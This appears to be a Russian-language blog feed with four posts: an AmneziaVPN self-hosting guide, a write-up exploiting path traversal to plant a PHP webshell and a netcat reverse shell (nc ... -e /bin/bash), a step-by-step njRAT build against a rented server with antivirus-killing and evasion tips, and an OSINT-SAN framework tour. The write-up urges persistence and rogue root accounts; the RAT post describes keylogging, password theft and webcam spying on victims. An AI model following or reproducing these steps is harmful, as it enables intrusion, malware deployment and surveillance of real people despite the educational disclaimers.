Я буду ставить приложение на Kali, так как с виндой и андроидом думаю всё и так понятно.

Качаем установщик по ссылке.

Распаковываем из архивов наш файл установщика:

И запускаем командой: ./AmneziaVPN_Linux_Installer.bin

В открывшемся установщике жмем далее и вводим пароль от нашего аккаунта:

После установки приложения вводим в терминале команду: AmneziaVPN

Открывшееся приложение

В открывшемся приложении жмем на кнопку начала и попадаем в главное меню:

Здесь нам предлагается:

Вставить купленный ключ на доступ к уже готовым VPN серверам от AmneziaVPN
Подключиться к бесплатным и платным (если мы вставили ключ) серверам
Развернуть свой VPN-сервер (то чем мы сейчас и займемся)
Восстановить конфигурацию из резервной копии - на случай если у нас уже есть готовый сервер, и мы хотим перенести root-доступ на другое устройство
Подключиться к другому VPN-серверу, не AmneziaVPN - здесь мы можем подключиться прямо в этом приложении ко множеству других VPN-сервисов с помощью конфигурационного файла.

И так, выбираем третий пункт - Self-Hosted VPN:

Self-Hosted VPN

Здесь нам нужно вбить данные, которые мы получили, когда арендовали VPS.

Если мы введем неверные данные, то нам выдаст ошибку:

Что ж, тут я решил пойти не стандартно, и вместо пользователя root создал отдельного пользователя vpn, добавив его в группу sudo. Вам этого делать не обязательно, просто вставьте данные которые вам пришли после аренды сервера.

Проверяем работоспособность с другим пользователем

После успешного подключения нам сразу предложат установить VPN-сервис:

LOW - не проверял, вероятно установится что-то вроде OpenVPN сервера
HIGH - здесь установится модифицированная версия WireGuard под названием AmneziaWG.
Выбрать VPN протокол - вот на него то мы и нажимаем.

Здесь нам выпадает список всех доступных для установки VPN сервисов. Лично я рекомендую XRay и OpenVPN over Cloak как наиболее продвинутые технологии VPN, с имитацией живого web-трафика, защиты от активного зондирования.

Для примера выбираю XRay:

Здесь можем выбрать свой порт, на который будет установлен данный контейнер. Я оставлю тот что мне предложила прога и нажму install.

Теперь у нас пойдет процесс установки, а в терминале можно увидеть какие команды выполняются на сервере:

Наш эксперимент с другим пользователем провалился, выдав нам ошибку:

Это существенный недостаток, однако, давайте вернемся назад и укажем логин и пароль от root пользователя:

В этот раз у нас успешно запустился процесс установки, ждем окончания:

По окончании нас будет ждать такое окно:

Кнопка подключения подключит нас к VPN.

Кнопка поделиться даст нам возможность дать доступ нашим товарищам, при этом не давая доступ на администрирование сервером.

В настройках можем сделать резервную копию, а также доустановить другие сервисы на сервер

Для примера откроем первое окно Servers, выберем наш сервер и установим туда Tor сайт.

После установки можем зайти и получить ссылку на наш сайт в darknet:

Если что работает на WordPress. Заходим по ссылке и устанавливаем сайт:

В окне управления можем перезапустить наш сервер, удалить все сервисы со следами с нашего сервера, и удалить сервер из приложения (сам сервер останется):

Ну вот собственно и всё. VPN получен, остальные функции оставлю вам на самостоятельное изучение. Продукт годный и лично мне за его удобства очень понравился. Функции реализованы за счёт готовых docker контейнеров.

Тестируем на whoer.net наш vpn пока не добьемся желаемого результата. Для этого меняем доступные VPN-сервисы и VPS провайдеров, а также расположение сервера и настройку своей системы (или меняем систему в целом, например).

Выводы

AmneziaVPN отлично подойдет тем, кто не прошарен в IT сфере или просто не хочет особо заморачиваться с развертыванием столь обывательских инструментов.

Данное решение позволяет автоматизировано развернуть большое количество сервисов, однако не даёт возможности гибкой настройки и подключения к серверу не под root пользователем - что значительный минус.

Сервисы упакованы в docker контейнеры. Такая изоляция гарантирует дополнительную безопасность.

Как итог - годная штука для тех кто не силён в самостоятельном развертывании сервисов на Linux серверах, а также для тех, кто хочет изучить и быть может даже помочь в разработки подобных решений.

Благодарю за прочтение статьи.

Write-up - эксплуатируем Path Traversal и уязвимость command injection

2024-11-03T19:38:17.040Z

Дисклеймер

Информация ниже предоставлена в ознакомительных целях. Ответственность за все действия несёте исключительно вы. Автор настоятельно рекомендует не нарушать действующие законодательства стран и использовать полученную информацию в образовательных целях.

Введение

Всем привет! Сегодня мы будем ломать сайт приватного канала, который выглядит вот так:

Стартовая страница сайта

Начало анализа web-приложения

Первое, с чего начинается взлом сайта - проверка его функционала, то, с чем мы будем в последующем работать. Так что давайте как тут и задумано, попробуем вставить URL какой-нибудь картинки из интернета.

"Картинка" из интернета

Как видим, вместо отображения картинки, нам отобразилась её внутренность, т.е. как бы выполнилась команда cat (прочтение содержимого файла). Интересный момент, стоит обратить на него внимание.

P. S. кстати, если бы мы вставили ссылку какого-то сайта, то у нас отобразился сайт, типо как в <iframe> html теге. Это важно, так как это нам даёт понять, что сервер принимать в качестве url не только адрес картинки, но и любой другой url адрес, что может позволить нам выполнить атаку типа CSRF (затрудняюсь ответить правильное название в данном случае).

Теперь обращаем внимание на то, что наша ссылка в URL браузера вставилась после вызова php функции ?file_url (в php, функции следуют после символа ?). Давайте попробуем туда написать вместо URL картинки например слово test.

Вписываем незапланнированный пользовательский ввод

Видим что наш запрос успешно выполнен, ошибок нет. Возможно, стоит попробовать ввести какую-то команду? Но прежде мы с вами погрузимся в небольшую теорию...

Краткий экскурс в мир Линуса Торвальдса

В Linux системах есть встроенная программа - cd (change directory, от англ. "выбрать папку").

Суть данной (как и остальных, но об этом как-нибудь в отдельной статье по линукс) программы в том, чтобы просто перемещать нас по нужным папкам.

Как происходит выбор папки.

В терминале необходимо прописать команду:

cd путь_до_папки

А теперь внимание - существует абсолютный и относительный путь.

Абсолютный путь - это когда мы начинаем с корневой директории (как правило с самой первой директории на жестком диске) и спускаемся в нам нужную.

Например:

cd /home/user1/Desktop/top_secret/

В данном случае мы с вами после запуска программы cd переходим с помощью ввода / в корневой каталог. Затем вводим там папку home и с помощью / заходим уже в неё. Таким образом доходим до нужной директории, в конце ставим / чтобы выбрать её и готово. Мы с вами попадаем в папку top_secret пользователя user1 и можем делать с её содержимым что хотим.

Относительный путь - это когда мы хотим переместиться на директорию выше или во вложенную директорию относительно той, в которой мы сейчас находимся

Например:

cd ./lib/tools/

cd ../magic/env/

cd ../../home/user2/test/

Как вы уже заметили, здесь появились некие точки (одна и две). Что значит этот айтишный заговор? А значит он следующее: одна точка - это текущая папка; две точки - это папка уровнем выше, т.е. как бы вернуться на папку назад, в которую вложена наша.

Таким образом слеш </> отделяет папки друг от друга, выполняет функцию перехода в папку. Знаки точек выполняют функцию ссылок, одна точка - текущая папка; две точки - папка повыше.

И так, возвращаемся к нашему сайту.

Просматриваем файл с пользователями linux

Здесь мы пошли на хитрость и попробовали открыть файл passwd с пользователями, который по умолчанию хранится в линуксах в папке /etc/.

В данном случае методом тыка мы обнаружили уязвимость Path traversal. Path traversal - это уязвимость приложений, заключающаяся в возможности выхода за пределы директории и чтения произвольных файлов на сервере.

Читать этот файл (опять же как правило) могут все, и важный момент - мы используем именно относительный путь, поскольку абсолютный как правило не сработает по ряду определенных причин.

По сути то что нам открылось содержимое файла уже говорит о многом. В Bug Bounty нам бы уже дали заслуженную денюжку и мы сидели пили чаёк. Но мы отбитые хацкеры, потому нам интересен процесс взлома, а не баги и уязвимости. Продолжаем ломать ~~голову~~ систему.

Payload - ищем способ доставки полезной нагрузки

И так, попробуем вместо картинки заслать сайту специальный webshell. Лично я не силён в познаниях ЯП PHP, так что, воспользуемся готовым вариантом из моего Telegram канала. Это простой и прикольный php webshell, который позволит нам выполнить код прямо на странице сайта.

Хорошо, у нас есть готовый payload, теперь его нужно как-то доставить. В нашем случае сайт принимает на ввод URL адрес. Значит нам нужно публично выложить наш payload в интернет и получить на него прямую ссылку (вы же помните про NAT из прошлой статьи, так что придется похимичить).

Здесь можно было бы попробовать подходящие файлообменники. Можно было бы попробовать с нашей системы дать публичную ссылку с помощью, например, программы ngrok. Но мы с вами поступим другим способом - арендуем VPS.

Арендованный VPS

Итак, дедик (dedicated server, от англ. выделенный сервер) мы с вами взяли, подключаемся к нему по ssh.

Подключившись, установим на него web-сервер, который бы позволил нам получить URL адрес на наш payload. Например Apache.

Устанавливаем apache2

Команда для установки простая: apt install apache2.

После этого файлы нашего сайта будут располагаться в папке /var/www/html/.

Переходим туда, удаляем дефолтные файлы.

Создаем новый файл, назовем его например webshell.php и копируем туда содержимое того, что вы скачали выше с моего канала.

Создаём файл webshell.php

Вставляем содержимое нашего payload в файл

Команда простая: nano webshell.php

Далее просто ctrl+c, ctrl+v. И для того чтобы сохранить пишем ctrl+o, подтверждаем запись данных нажав на Y. После этого выходим из редактора нажав на ctrl+x. Подробнее как пользоваться редактором nano можете почитать тут.

Так как мы создали этот файл по пути /var/www/html/webshell.php, то он теперь у нас доступен в интернете по адресу http://ip_сервера/webshell.php.

Проверяем доступность файла

Перейдя видим, что наш шелл (shell, от англ. оболочка) работает. Если бы на нашем сервере был установлен php, то мы смогли бы выполнять linux команды прямо здесь, введя их в строку и нажав на Execute (от англ. выполнить). А в графе Output (от англ. вывод) появился бы вывод результата выполненной команды, в случае, если эта команда успешно выполнилась.

Что ж, остаётся только кинуть ссылку на наш атакуемый сайт и кайфануть от сработавшей оболочки, и, о нет...

Error

Оказывается .php файлы наш сайт не хочет принимать. Что ж, в таком случае попробуем снова пойти на хитрость и переименуем наш файл с .php на .html расширение.

Переименовываем файл

Делается это командой: mv webshell.php webshell.html.

Вообще команда mv служит для перемещения файлов, но также ей таким образом можно и переименовать файл как в нашем случае, но об этом как-нибудь в другой раз.

Пробуем ещё раз:

Успех

И о да, оболочка запустилась.

Вы вероятно можете задаться вопросом - а как мы запустили php файл переименованный в html???

Всё просто - при определенной настройке web-сервера он начинает считывать html файлы как php файлы. Сделано это для того чтобы сервер мог выполнять встроенный в html код ЯП PHP. В нашем случае такая настройка сервера привела нас к возможности выполнить свой произвольный код.

Теперь давайте выполним пару команд и получим флаг.

PWD - где мы?

Узнаем в какой мы сейчас папке с помощью команды: pwd

Теперь с помощью команды ls посмотрим список файлов в нашей текущей папке и команды cat прочитаем их содержимое:

Команда ls

Команда cat

Ну и почитав содержимое файла, видим здесь наш флаг (выделен мышкой).

Флаг в php файле сайта

В реальности же изучать файлы сайта очень важно для нахождения различных api, логинов и паролей от баз данных, скрытых комментариев и так далее.

Получаем netcat shell в терминале

И так, задачка решена, но, на самом деле можно получить удаленный доступ к серверу и с помощью привычного терминала. Для этого создадим другой payload со следующим содержимым:

<?php system("nc -nv ip_нашего_сервера 4444 -e /bin/bash");?>

Наш payload

Разберем кратко что тут есть:

nc -nv - запускает программу netcat, которая выполнит запрос по следующему далее ip и порту
90.156.x.x - ip адрес нашего арендованного VPS (ну или наш если мы оформили статический/белый ip у нашего интернет-провайдера)
4444 - порт, по которому будет подключаться удаленный сервер к нашему серверу. Может быть любой не занятый, например 1604 или 1111, главное чтобы на обоих серверах он был свободен, не блокировался файрволлом и был одинаковый.
-e /bin/bash - тут мы просим после установления подключения запустить оболочку bash, которая у всех linux по умолчанию есть. Если нет, то можно заменить на например /bin/sh

Сохраняем payload на нашем сервере, копируем ссылку на него, и далее снова на нашем сервере выполняем следующую команду:

nc -lvnp 4444

Запускаем лисенер (прослушивалку трафика)

Здесь мы говорим нашему серверу ждать, пока кто-то к нам подключится по порту 4444 (или по другому, который мы вписали в payload. Главное чтобы был одинаковый).

Ну что, зашлем снова ссылку на наш payload серверу и увидим, что он как бы "завис" в обработке нашего запроса:

Установленное подключение. Выглядит как "зависший" запрос сервера.

Проверяем терминал нашего сервера и ура - видим успешное подключение к серверу. Сразу введем следующие команды:

id - посмотрим от имени какого пользователя мы получили доступ
script /dev/null -c bash - здесь мы делаем более удобную для себя оболочку. Такой как бы псевдо-bash, чтобы мы видели в какой папке находимся и от имени какого пользователя, хоть это и не заменяет полноценного подключения к оболочке, например по ssh.

Успешное получение удаленного shell

Выполним каких-нибудь пару команд:

Видим не назначенную домашнюю директорию и наличие группы пользователей sudo

Здесь видим что есть установленная программа sudo - с её помощью можно было бы попробовать получить полный доступ над сервером, например с помощью команды: sudo -i. Но это не этот случай.

Здесь мы можем вывести содержимое того же файла и получить флаг:

Получение флага в терминале

Выводы

При взломе web-приложения следует начать с попыток осмыслить принцип работы тех или иных его функций, отвечающих за выполнение каких-то операций на web-сервере.

Взлом web-приложения может быть осуществлён как с помощью манипуляции с запросами (как например в одной из прошлых статей), так и с помощью более сложных атак, как в данном случае.

В любом случае после успешного взлома и получения доступа к терминалу удаленного сервера, постарайтесь проанализировать файлы сайтов, программу sudo и прочие возможности закрепиться в системе.

Запомните, основная задача при проведении атаки - открыть себе постоянный удаленный доступ, в идеале найдя логин:пароль или создав нового пользователя с root правами для подключения по ssh.

Благодарю за прочтение статьи.

RAT, NAT и прослушка - получаем удаленный доступ к ПК.

2024-10-28T11:34:07.356Z

Введение

Remote access trojan (RAT, от англ. Троян удаленного доступа) - троян, предоставляющий атакующему удаленный доступ к информационной системе. Как правило ратники (так называют в обиходе данные вирусы) делятся по системам: для Android, IOS, Windows. Есть платные и бесплатные, с закрытым и открытым кодом. Мы с вами посмотрим на один из примеров данной программы дабы разобраться, как оно работает, на все подводные камни данной штуки.

Дисклеймер

Действия показанные в данной статье караются законом, вся описанная информация несёт исключительно образовательный характер. Не пытайтесь применять это на практике.

Глава 1 - кажется что-то не работает.

И так, как я уже ранее и сказал, наша цель - получить удаленный доступ к компьютеру жертвы. В моем примере жертвой будет мой компьютер, а админом - арендованный Windows Server.

Но почему так? А всё просто, и сейчас я тебе объясню что будет, если ты попытаешься со своего компа заслать вирус жертве.

NAT - network address translation (преобразование сетевых адресов)

В далеком бородатом году, когда люди стали подключаться к глобальной сети интернет, протокол идентификации сетевых устройств (ip; internet protocol от англ. межсетевой протокол) 4 версии имел достаточно ограниченное количество адресов - 4 294 967 296. Т.е. всего интернетом могло пользоваться чуть более 4-х миллиардов устройств. Но так уж вышло, что люди подсели на порнушку, аську и прочие приколюхи, что-то вроде донатов на наноферму (а могли бы мне донатить) и так далее. И вот, семь миллиардов человек по приблизительному подсчету, стали стремительно поглощать интернет. А тут ещё и всякие провайдеры, дата-центры и прочие корпоративные коридоры серверов стали мгновенно сжирать все запасы адресов. И тут IETF (Инженерный совет Интернета) начал понимать, что такими темпами интернет закончится и новые пользователи не смогут подключиться к вообще-то ИНТЕРНАЦИОНАЛЬНОЙ сети, т.е. к мировой. А значит она уже станет не такой уж и мировой и всей этой утопичной идее придет конец.

Тогда людям пришло в голову одновременно две гениальные вещи:

Расширить количество адресов. Таким образом ipv4 заменил ipv6. Или не заменил? Ну, в целом идея была хороша - ибо в 6 версии протокола ip таких уникальных адресов стало бы аж 340 282 366 920 938 000 000 000 000. Но, технически перевести всю аппаратуру на новую версию протокола сложно, а потому, данный процесс медленно пытается по сей день двигаться.
Методы делегирования адресов. Тут всем на помощь пришла популярная метода NAT.

И так, если с ipv6 всё понятно, то в чем суть NAT.

Вы подписываете договор на подключение с вашим провайдером. Далее провайдер подключает свой провод к вашему... пк? роутеру? Кто знает...

И тут есть нюанс:

Подключение по этому проводу провайдера между тобой и провайдером происходит по протоколу PPPoE. По сути это такой протокол, при котором чтобы тебе подключиться к интернету провайдера, нужно иметь логин и пароль. Можно ли подрезать кабель и сбрутить акк? Хз, не пробовал) но вполне возможно.
Подключение между тобой и провайдером идёт по протоколу DHCP. Здесь в таком случае если сосед спиздит у тебя провод и воткнет себе, то у него будет работать интернет, ибо никаких логинов и паролей для этого не надо. Надежно? - да пиздец.

Ну вот мы подписали договор, идёт у нас электрический ток по интернет кабелю, присылаются единички (0.5-1v) и нули (<0.5v), компьютер/роутер считывает данные сигналы и преобразует их в соответствующие кадры, пакеты и т.д. - всё как завещала модель OSI.

Далее, ответьте на простой вопрос - куда идёт весь ваш трафик когда вы заходите на свой любимый оранжевый ютуб?

Раньше, ваш запрос бы шёл НАПРЯМУЮ на ip адрес сервера сайта, к которому вы обратились. Этот ip называется белый ip, или - статический. Т.е. вам выделен один конкретный ip адрес по договору с вашим провайдером.

Но так как сейчас беда и этих белых адресов не хватает, то его закупает себе контора провайдеров, подключает с ПРЯМЫМ выходом в интернет свои главные сервера, а дальше создаёт большую, тернистую и страшную локальную сеть, к которой подключены их серваки для распределения нагрузки, фильтрации трафика, прослушки, и где-то там в конце, наконец, подключены по договору мы, их клиенты. Такой ip называется серым, локальным, может быть динамическим и статическим, но чаще динамический. Он внутренний локальный. Т.е. поймите главную вещь - в интернет выходим не мы, а наш провайдер. Через него идёт весь трафик и направляется нам.

Серые ip (мы) - белые ip (сервера, сайты и т.д.)

Такая схема очень напоминает атаку посередине - т.е. когда между тобой и твоим собеседником стоит некая темная личность, которая может исказить то что ты говоришь, и обратно, сказать тебе то, что тебе не говорили. Или вообще ничего не сказать, что называется у нас блокировкой сайтов).

Атака "человек посередине" - MITM.

А теперь возвращаемся к сути вопроса - как жертва подключится к нам, т.е. предоставит удаленный доступ? Ответ - никак. Ну, или почти никак. Всё что она будет, так это стучать на наш внутренний ip адрес (которого нет публично в сети Интернет), либо стучать на публичный ip адрес нашего провайдера, который мы можем посмотреть, зайдя например сюда.

На своем примере ниже показываю как это выглядит:

Слева где замазанный ipv4 - это ip, назначенный провайдером. Справа - это ip сервера провайдера, к которому я подключен по своему локальному ip типа 10.34.x.x. Вот тот что справа (95.83.x.x) посылает запрос на сайты, получает ответ и переадресовывает мне, на мой локальный ip 10.34.x.x.

Вот так работает интернет. Так что зараженный пк нашим ратником на данном этапе будет долбиться лбом об стену (ну или об пол, призывая ~~бога~~ антивирус).

Глава 2 - чиним наш интернет.

Разобравшись с проблемой поговорим о способах решения и о других попутных проблемах:

Запрос на выделение статического ip адреса. Звоним нашему провайдеру и просим дать нам выделенный ip адрес. Как правило большинство провайдеров за дополнительную стоимость без проблем предоставят вам белый ip адрес. На него то вы и будете клипать ваш вирус. Какие проблемы? - то что жертва при должной сноровке увидит, что некий подозрительный файл стучится по такому-то ip адресу. И этот ip адрес конечно же будет ВАШ). Ну а дальше останется только надеть маску анонимуса, оставить ключики под ковриком и ждать БСТМ.
Backend на хостинге. Да, можно написать backend часть на например php, и указать вашему rat стучаться на ваш сайт к этому файлу, который бы ретранслировал соединения на ваш комп с запущенной админкой. Стильно, модно, по хакерски.
Аренда VPS. Этот способ я сегодня вам и покажу, потому как он менее затратный, не требует знаний backend разработки, да и вообще для нубасиков вроде меня самое то. Здесь мы получаем систему с уже белым ip, не нашим, к которому злоумышленник бы подключался по vpn, тем самым обезопасив себя от деанона.

И так, погнали реализовывать третий пункт.

Первое что сделаем - зарегаем аккаунт на каком-нибудь VPS и потратим пару шекелей на счёт.

Арендованный сервер

После того как мы регнули акк и пополнили счёт (в некоторых местах можно криптой пополнить, что удобно) - арендовываем windows server.

Лично я выбрал такие параметры: Windows Server 2022 RAM 4GB Хранилище 60GB Процессор 2 Ядра.

Вот, теперь нам нужно подключиться к нему. В Windows есть встроенная утилита "Подключение к удаленному рабочему столу".

Программка на Windows для RMS.

На линуксе можно установить Remmina или любой другой RMS на выбор.

RMS (Remote Manipulator System - удаленное администрирование системой). Не троян, носит легальный характер доступа к удаленному пк, типо как тот же SSH.

Вводим ip от нашего сервака, логин и пароль. И видим рабочий стол арендованой винды.

Рабочий стол Windows Server 2022 (программа Windows Server).

Здесь нас встречает встроенная прога на windows server - она нам понадобится чтобы установить некоторые зависимости.

Нам нужно тыкнуть здесь вот сюда:

В открывшемся окне жмем next до момента, пока не дойдем до Features:

Здесь ставим первую галочку (устанавливаем .NET Framework 3.5.). Ну и в целом готово, далее по вкусу можно русифицировать систему. Жмякаем next, далее на кнопку install и пойдет процесс установки зависимостей.

По окончании нас встретит такое окно, означающее окончание установки:

Это окно и прогу можно закрывать.

Теперь берем наш билдер (генератор вируса), нажимаем ctrl+c, заходим в окно с windows сервер, и вставляем туда, ctrl+v. Всё, у нас через инет закачается наш билдер. Заранее через winrar сделайте sfx архив с паролем, чтобы нигде антивир ничего не удалил, и предварительно отключите их у себя и на windows server.

Поискав несколько ратников, нашел вот этот рабочий - NjRAT.

Запускаем Danger edition и видим такое окно:

Окно NjRat

Там где порт - указываем любой порт, который не будет занят. Обычно это между 1000 и 10000. Например выберем тот порт с которого я познакомился с ратниками, ещё когда по юпупам гуляли видосы про darkcometrat - 1604. Пароль поставим 12345.

Жмем Save и Start

Теперь у нас прослушивается трафик на 1604 порту. Нам надо создать вирус, который бы на него стучался. Т.е. стучался на нашip:нашport. В моем случае это будет 150.241.91.82:1604.

Для этого жмем внизу проги на слово-ссылку builder.

У нас откроется такое окно и даа.. - у вас откроется тромб от увиденного разнообразия и непонимания всего происходяего.. ща всё в краце поясню.

Картина Репина - инфаркт жопы.

Ну первым делом Host и порт - здесь вместо локального ip по-умолчанию (127.0.0.1) вставляем наш, тот, по которому мы подключились к серваку. В моем случае это 150.241.91.82.

Далее галочка Kill Anti Process и Copy Directory включает нам следующие окошки:

Анти-процесс - закрывает указанные проги которые мы выбрали. То есть наш ратник следит за процессами в системе, и как только видит какой-то из выбранных нами - сразу же его убивает. Это позволяет бороться с установщиками антивирусов и прочими прогами, которые могут спалить нас или наш ратник.

Копирование в директории - просто копирует наш вирус во многие места, чтобы его было тяжелей найти и удалить.

Остальные функции не так интересны, так что, оставим всё выключенным для теста, единственное только добавим наш хост, введя ip нашего сервера и нажав на кнопку Added.

После этого у нас появится наш зашифрованный паролем хост и кнопка Build, на которую мы жмякаем и собираем ратник.

Готово. Наш вирус создан, и теперь пробуем закинуть его себе на комп (но лучше не быть экстремалом как я, а загрузить его на виртуалку) и протестить

Но, после запуска ничего не случилось - поэтому на сервере пришлось отключить файрвол чтобы всё заработало:

На самом деле конечно отключать его не стоит, достаточно просто пробросить наш порт в настройках файрвола, но мы не будем этим сейчас запариваться.

Глава 3 - функционал.

И так, для примера я повторил это всё во второй проге из папки с ратниками, и вот что вышло:

Это наш зараженный комп. Таких может быть много.

Теперь кликнув правой кнопкой мыши мы можем увидеть функции, доступные нам.

Менеджер контроля:

Даёт нам возможность получить доступ к файловой системе, реестру, командной строке, процессам и службам, а также посмотреть текущие сетевые подключения. Здесь же мы можем скачать, загрузить и запустить любые файлы, например другие вирусы.

Вторая функция запуска файла повторяет тоже самое. Позволяет выбрать наш файл на компе, отправить его во временную папку и запустить.

Удаленный экран

Позволяет совместно проводить время с жертвой за просмотром культурных фильмов. А функция удаленной камеры и микрофона ещё и позволит проникнуться полностью его эмоциями и впечатлении о происходящей на мониторе картине. Помимо этого удаленный экран дает возможность перехватить управление мышкой и клавиатурой, делать скрины и запись экрана в некоторых ратниках.

Остальные функции думаю и так понятны, сами попробуйте и потыкайте. Воровалка паролей ворует пароли, кейлогер записывает то, что печатает на клавиатуре жертва.

Кнопка сервер позволяет удалить или обновить наш ратник, например, когда мы обновили его версию, по новой закриптовали (зашифровали для того чтобы антивирусы не видели вирус как вирус).

Каков итог?

Если ваш пк ведёт себя странно - посмотрите на процессы и соединения в службах Windows.

Ратник позволяет легко управлять устройствами жертв, получая полный доступ и неограниченные возможности над ними - но раскрывает ip вашего сервера/vpn/proxy/etc...

Используйте эту информацию чтобы проверить, как оно работает, и знать, как от этого можно защититься и даже сдеанонить мамкина доксера.

На связи был Hunter Ghoul, подписывайтесь на мой канал и до новых встреч.

OSINT-SAN Framework - или чё такое OSINT.

2024-10-27T12:10:48.721Z

Картинка из Github разработчика

Введение

OSINT-SAN Framework - это семейство OSINT-ориентированных утилит, предназначенных для упорядоченного сбора и хранения данных с помощью автоматизированных скриптов - парсеров.

Парсеры - это такие скрипты, которые на вход принимают некоторые данные, после чего обрабатывают их и сохраняют в удобном формате. Под обработкой понимается запрос на различные ресурсы и базы данных, где введенная информация сопоставляется с массивом других данных. Да, BIG DATA создаёт BIG BROTHER, так что парсеры заточены на то, чтобы вытащить релевантные данные по нашему запросу из массы источников.

Если источники открытые, то, это как правило в разведывательных сообществах принято называть OSINT (open-source intelligence, англ. разведка по открытым источникам).

Если же источники носят закрытый характер, например это какие-то федеральные базы, оперативное досье, сводки и так далее - это уже прямой путь в так называемый "пробив". Т.е. к подкупу действующих сотрудников, имеющих посредственный или непосредственный доступ к базам данных, готовых за определенную сумму вытащить оттуда всю инфу по вашему целевому запросу.

Но сегодня речь пойдет о clearnet, об открытых (по крайней мере относительно) источниках, и в частности о программе OSINT-SAN, потому как на её примере я хочу показать, кто такие на моё субъективное мнение асынтеры, те, которые действительно могут ими считаться.

Глава лирическая - OSINT-NASRAL.

И так как я уже ранее упомянул, OSINT-SAN - это фреймворк, т.е. семейство инфо продуктов. В отличии от например глаза бога, он состоит не только из одного телеграм бота. OSINT-SAN состоит из 3-х клиентов:

Linux client - скачать можно тут.
Web client - найти можно тут.
Telegram бот - он обитает тут.

В целом, почему назвал так данную главу - потому как на момент написания статьи работает это всё коряво, с багами и недоработками. Но, благо - работает!!! Да и цель не реклама продукта и даже не продвижение массы. Цель написание данной статьи иная, в конце поймете.

Linux client - установка и использование.

Ну, погнали попробуем скачать и установить клиент на линукс.

Требования:

Я использовал kali linux, последняя версия для virtualbox. Про гипервизоры потом отдельно поговорим.
Нужен установленный python 3 версии. С поддержкой pip. В kali linux по умолчанию установлен.

Ну вот и все собственно требования. Память на жестком диске, память оперативная. В общем всё по стандарту чтобы всё запустилось и работало.

Теперь установка по шагам:

Мы с вами скачали и распаковали архив последней версии клиента.

Распакованный клиент OSINT-SAN Framework.

Далее открываем здесь командную строку, выполняем sudo -i чтобы стать root-ом, и далее просто запускаем установку клиента командой python3 install.py. Потребуется подключение к интернету и некоторое время чтобы установились все зависимости.

Запуск установки клиента.

После успешного (но таки да, с ошибками...) завершения процесса установки нас будет ждать сообщение о том, как запускать данный клиент.

Завершение установки.

По итогу у нас при установке в папке клиента создалась папка для python-venv - OSINT-SAN_ENVIRONMENT. Давайте посмотрим в неё.

Папка нашего клиента с OSINT-SAN_ENVIRONMENT

Содержимое папки OSINT-SAN_ENVIRONMENT

Содержимое файла activate

Если вы шарите за python, то для вас данный фреймворк должен стать хорошим другом для изучения того, как можно всё автоматизировать и красиво сделать с помощью данного ЯП (языка программирования).

Теперь, пока вас не успел схватить инфаркт, поясняю - процесс запуска клиента мы с вами автоматизируем, чтобы не пришлось по сто раз вводить все эти команды.

Создадим с вами файл на рабочем столе, назовем его например osanrun.sh (.sh - это формат исполняемых файлов linux, bash скриптов.

Теперь пропишем в нём следующее:

Содержимое файла osanrun.sh

#!/bin/bash cd /home/kali/Downloads/last_client/ source OSINT-SAN_ENVIRONMENT/bin/activate python3 san.py

Что здесь написано?

#!/bin/bash - здесь мы вызываем работу в bash.

cd /ваш_путь_до_клиента/ - здесь мы с вами переходим в папку с нашим клиентом (именно путь до клиента, не до OSINT-SAN_ENVIRONMENT ).

source OSINT-SAN_ENVIRONMENT/bin/activate - здесь мы задаем путь к нашей созданной python-venv библиотеке или как там правильно, не шарю.

python3 san.py - здесь мы запускаем наш клиент.

Сохраняем наш файл, открываем терминал на рабочем столе и пишем: chmod +x <название нашего файла> и запускаем командой sudo ./osanrun.sh (заменить на имя вашего файла).

Команды для запуска нашего скрипта

Окно OSINT-SAN

И да, ура, у нас запустился клиент. Теперь, нужно до установить зависимости - пишем слово driver и жмем Enter

Начало установки driver

Конец установки driver

На всё соглашаемся и после чего видим окончание установки. Для того чтобы очистить экран от всего лишнего вводим команду clear

Теперь авторизовываемся в клиенте, введя цифру 1.

Авторизация

Здесь нас просят ввести логин и пароль от учетки. Учетка платная, благо у меня есть и я вам покажу платный клиент. Вы можете скачать с гитхаба бесплатную версию и пощупать её.

Главное меню клиента

После авторизации нас встречает главное меню клиента.

Красными словами написаны команды, введя которые мы перейдем в соответствующий модуль со ссылками на источники, где можно поосинтить интересующую нас фигню, а также воспользоваться встроенными инструментами и самописными парсерами.

Попробуем на примере телефона, введя phone.

Выдача по номеру

Выдача по номеру (продолжение)

Но это всё полная хрень по сравнению с главной (как по мне) функцией - возможностью создать отчёт.

Для этого мы вводим команду pdf или project

report manager

У нас открывается пофикшенный в 13 версии report manager. Здесь чуть-чуть остановимся на функциях:

Создаёт проект, после этого мы с можем в него зайти и работать.
Показывает списки проектов.
Запускает нас в выбранный нами проект.
Удаляет выбранный проект.
Генерирует отчёт.

Ну 99 это стандартная кнопка выхода в главное меню.

Не буду останавливаться на всех тулзах и фичах, кроме как выбора нашего проекта и генерации отчета. И так, мы уже создали проект с помощью цифры 1. Теперь выберем его с помощью цифры 3.

Выбор проекта

Возвращаемся в главное меню и видим следующее:

Главное меню и отображение нашего проекта (выделено)

Теперь у нас отображается test1 там где мы вводим команды.

Окей, теперь всё что нам остается, это поискать здесь инфу по нашей цели и сгенерировать отчёт.

Тут у меня выдало ошибку и здесь мы возвращаемся о корявости проекта.

Здесь мы заходим в модуль region который позволяет по нашему запросу доркнуть события в интернете. Доркинг - это использование слов-фильтров в поисковых системах, таких как Google, Yandex и другие.

Ну короче - чтобы нам добавить русский язык в кали, заходим в менеджер настроек, ищем там настройку Keyboard, заходим в Layout, выключаем вверху флажок дефолтных настроек, и с помощью разблокированной кнопки Add добавляем русский язык. В графе Change layout option выбираем как переключать язык, например стандартно Alt + Shift.

Ну вот и всё. Собираем запросики событий в инете и идём генерить отчет.

Здесь ещё подсобрали инфу по почте.

Ну и напоследок скажу об одной важной команде - help.

Здесь у нас отображаются красным все слова-модули, и ещё отдельным цветом в список так называемые теги. Теги - это слова, которые выдают нам источники где нарыть интересующую инфу. Проще говоря вбиваем тег, жмем Enter, и нам выдаст ресурсы на источники где можно пошерстить инфу по этому тегу. Например вводим email - получаем список сайтов где можно по email найти другие данные. Что-то вроде HowToFind и прочих агрегаторов инфы по OSINT источникам.

После окончания работы над проектом, обратно заходим в менеджер проектов.

С помощью цифры пять выбираем наш проект и генерим отчет, о чем успешно нам сообщает OSINT-SAN, написав, что наш отчёт сохранен в папке report/

Отчёт прикреплю к посту в комменты, так что сами сможете с ним более подробно ознакомиться. В ознакомительных целях конечно же.

И пару слов о других прогах.

Значит Web-клиент выглядит так:

Здесь прикольная фишка с камерами на карте, но на момент написания поста она сдохла, увы.

